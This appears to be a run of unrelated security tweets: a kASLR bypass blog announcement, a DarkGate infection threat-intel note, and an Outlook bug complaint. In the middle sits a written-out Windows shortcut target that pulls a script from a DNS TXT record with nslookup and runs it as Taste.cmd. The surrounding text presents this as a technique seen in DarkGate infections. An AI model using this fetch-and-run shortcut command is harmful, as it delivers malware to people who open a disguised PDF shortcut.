Just dropped a blog post on NtQuerySystemInformation changes that killed an old kASLR bypass. Added some internals research too, pre & post 24H2. Check it out!
https://t.co/9JoVieO9VC
Create a pdf shortcut with the target as follows:
```
%windir%\system32\cmd.exe cd %TMP% & NSlookup -type=TXT https://t.co/rTtQdyE6Nb | findstr " " > Taste.cmd & Taste.cmd
```
Payload:
2023-12-07 (Thursday) - PDF file found on VirusTotal led to #DarkGate infection - Windows shortcut retrieved DarkGate install script from DNS TXT record - activity may have started as early as 2023-11-27 - IOCs available at https://t.co/zFiBrqibvY
#TimelyThreatIntel#Wireshark
You know I even invented a "scoring system" for the attack vectors on Outlook (https://t.co/3tQFrL2Sp2). I'd be disappointed if this is still not able to convince MSRC to fix my bug. Well, kind of.. 😅